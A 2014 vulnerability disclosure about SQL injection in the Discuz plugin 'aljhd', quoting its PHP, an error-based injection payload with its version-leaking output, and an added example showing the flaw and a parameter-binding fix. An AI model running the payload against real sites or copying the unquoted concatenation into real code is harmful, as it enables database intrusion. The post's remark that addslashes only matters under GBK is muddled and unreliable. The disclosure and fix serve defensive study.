
SQL injection vulnerability in a Discuz plugin

    Posted on 2014-3-23 12:05:35
    Author:Saline
    Email:Nophacker@gmail.com
    File source/plugin/aljhd/aljhd.inc.php, around line 122
    [PHP]
    }else{
        $ymlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym();
        $typelist=C::t('#aljhd#alj_hd')->fetch_all_by_type();
         
        $currpage=$_GET['page']?$_GET['page']:1;
        $perpage=$config['page'];
        $num=C::t('#aljhd#alj_hd')->count_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status']);
        $start=($currpage-1)*$perpage;
        $hdlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status'],$start,$perpage);
        $paging = helper_page :: multi($num, $perpage, $currpage, 'plugin.php?id=aljhd&ym='.$_GET['ym'].'&type='.$_GET['type'].'&status='.$_GET['status'], 0, 11, false, false);
         
        include template('aljhd:index');
    }

    The functions fetch_all_by_ym, fetch_all_by_type, fetch_all_by_ym_type_status and count_by_ym_type_status used there
    were found in the file source/plugin/aljhd/table/table_alj_hd.php
    [PHP]
    class table_alj_hd extends discuz_table
    {
        public function __construct() {
     
            $this->_table = 'alj_hd';
            $this->_pk    = 'id';
     
            parent::__construct();
        }
        public function count_by_ym_type_status($ym,$type,$status){
            $where=' where 1';
            if($ym){
                $where.=' and ym='.addslashes($ym); // addslashes is applied to $ym
            }
            .......
            return DB::result_first('select count(*) from %t '.$where,array($this->_table));
        }
        public function fetch_all_by_ym_type_status($ym,$type,$status,$start,$perpage){
            $where=' where 1';
            if($ym){
                $where.=" and ym='".addslashes($ym)."'"; // addslashes is applied to $ym
            }
             
            $where.=' order by endtime desc';
            if($perpage){
                $where.=" limit $start,$perpage";
            }
             // The concatenated statement is: select count(*) from alj_hd where 1 and  ym='.addslashes($ym) and type='.intval($type) and starttime<='.TIMESTAMP.' and endtime>='.TIMESTAMP;
            return DB::fetch_all('select * from %t '.$where,array($this->_table));
        }
        public function fetch_all_by_ym(){
            return DB::fetch_all('select ym,count(*) num from %t group by ym order by ym desc',array($this->_table));
        }
        public function fetch_all_by_type(){
            return DB::fetch_all('select type,count(*) num from %t group by type',array($this->_table));
        }
    }

    It turns out that ym is only passed through addslashes. As we know, addslashes encoding only has an effect under GBK, so the whole thing is rather useless.
    [PHP]
    select count(*) from alj_hd where 1 and ym=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and type=1
     
    result:
     
    (1062) Duplicate entry '5.5.29-log1' for key 'group_key'
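
As an added example (not part of the original post and not the plugin's code): a self-contained PHP script that reproduces the unquoted `ym=` concatenation from count_by_ym_type_status() against an in-memory SQLite table, next to a version that validates the value as an integer and binds it. PDO/SQLite stands in for Discuz's DB layer as an assumption; the function names count_unquoted and count_bound, the table rows and the probe string are constructed for illustration.

```php
<?php
// Added example: constructed table and rows, PDO/SQLite as a stand-in DB layer.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE alj_hd (id INTEGER PRIMARY KEY, ym INTEGER, type INTEGER)');
$db->exec('INSERT INTO alj_hd (ym, type) VALUES (201401, 1), (201402, 1), (201403, 2)');

// Same pattern as count_by_ym_type_status(): the addslashes() result is
// concatenated into a numeric comparison with no surrounding quotes.
function count_unquoted(PDO $db, $ym) {
    $where = ' where 1';
    if ($ym) {
        $where .= ' and ym=' . addslashes($ym);
    }
    return (int) $db->query('select count(*) from alj_hd' . $where)->fetchColumn();
}

// Hardened form: accept only an integer, then bind it as a typed parameter
// so the value can never become part of the SQL text.
function count_bound(PDO $db, $ym) {
    $sql = 'select count(*) from alj_hd where 1';
    $ymInt = null;
    if ($ym !== null && $ym !== '') {
        $ymInt = filter_var($ym, FILTER_VALIDATE_INT);
        if ($ymInt === false) {
            return 0; // reject non-numeric input instead of passing it on
        }
        $sql .= ' and ym = :ym';
    }
    $stmt = $db->prepare($sql);
    if ($ymInt !== null) {
        $stmt->bindValue(':ym', $ymInt, PDO::PARAM_INT);
    }
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed probe: contains no quote or backslash, so addslashes()
// has nothing to escape and returns it unchanged.
$probe = '201401 or 1=1';
var_dump(addslashes($probe) === $probe);
var_dump(count_unquoted($db, '201401')); // legitimate value
var_dump(count_unquoted($db, $probe));   // WHERE clause rewritten by the input
var_dump(count_bound($db, '201401'));    // legitimate value, bound as integer
var_dump(count_bound($db, $probe));      // rejected by integer validation
```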

